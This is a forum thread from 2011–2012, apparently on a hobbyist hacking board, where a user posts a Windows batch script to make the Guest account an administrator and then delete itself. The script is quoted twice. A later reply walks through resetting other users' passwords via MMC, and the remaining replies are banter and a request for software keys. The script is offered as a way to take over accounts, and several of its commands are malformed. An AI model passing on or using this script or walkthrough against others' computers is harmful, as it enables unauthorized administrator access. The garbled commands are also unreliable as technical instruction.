How to use guest account to control Admin. account in Windows

killacom
uu001

How to use guest account to control Admin. account in Windows Empty
PostSubject: How to use guest account to control Admin. account in Windows   How to use guest account to control Admin. account in Windows Empty2011-08-03, 19:07

HEHEHEHE.................WHEN I SAY IM BACK,,,,I MEAN IT
U GUYZ HAVE BEEN SLACKING SINCE I WAS ON STRIKE..

TO ME A MEAG GUEST AND CONTROL ODA ACCOUNTS IN WINDOWS JST COPY AND PASTED THIS

echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0

.....................................................................................................
SAVE AS MEGUEST.BAT(OR ELSE UR SYSTEM WOULD CRASH ................................LOL JST JOKIN)

JST SAVE AS ANITIN.BAT AND RUN
IT WAT I'VE BEEN WORKING ON...

NOW U GUYZ ARE GION TO BE SAYIN WHOSE BOSS ON DIS SITE
uu001

PostSubject: Re: How to use guest account to control Admin. account in Windows   How to use guest account to control Admin. account in Windows Empty2011-08-03, 22:16

Allow me to challenge you @ mr stay
killacom

PostSubject: Re: How to use guest account to control Admin. account in Windows   How to use guest account to control Admin. account in Windows Empty2011-09-09, 08:56

You The Man
stanquest
stanquest

PostSubject: Re: How to use guest account to control Admin. account in Windows   How to use guest account to control Admin. account in Windows Empty2011-11-15, 06:42

stay wrote:
HEHEHEHE.................WHEN I SAY IM BACK,,,,I MEAN IT
U GUYZ HAVE BEEN SLACKING SINCE I WAS ON STRIKE..

TO ME A MEAG GUEST AND CONTROL ODA ACCOUNTS IN WINDOWS JST COPY AND PASTED THIS

echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0

.....................................................................................................
SAVE AS MEGUEST.BAT(OR ELSE UR SYSTEM WOULD CRASH ................................LOL JST JOKIN)

JST SAVE AS ANITIN.BAT AND RUN
IT WAT I'VE BEEN WORKING ON...

NOW U GUYZ ARE GION TO BE SAYIN WHOSE BOSS ON DIS SITE

where are we pasting the copied directions............really like to know
schoolboy741

PostSubject: Re: How to use guest account to control Admin. account in Windows   How to use guest account to control Admin. account in Windows Empty2011-12-19, 02:08

ok let me add to dat, u can go to run, and type "mmc" dats microsoft management control.it will pop up a window, click continue,it will then bring up d window.go to file, click Add/Remove snap in,it will pop up anoda window,by ur left u will see sum programs which d 1st 1 is aactive x control. scroll down to local users and group,then click add, then ok and finish.click ok again and it will take u bak to d previous window. click on the local users and group. it will drop down users then group, click users by the right hand side.it will then show u all d users on the pc,tight click on any1 u want to change the password and click set password.set the new password.and den ok.then save. u done Very Happy

PostSubject: Re: How to use guest account to control Admin. account in Windows   How to use guest account to control Admin. account in Windows Empty2012-01-10, 17:59

nice one bruv.

PostSubject: Re: How to use guest account to control Admin. account in Windows   How to use guest account to control Admin. account in Windows Empty2012-01-11, 11:00

GO TRY AM C. BUT U GUYS ARE TOO MUCH JARE.
yebsamm

PostSubject: Re: How to use guest account to control Admin. account in Windows   How to use guest account to control Admin. account in Windows Empty2012-01-12, 10:23

pls. i need remo recover 3.0 keys

PostSubject: Re: How to use guest account to control Admin. account in Windows   How to use guest account to control Admin. account in Windows Empty

How to use guest account to control Admin. account in Windows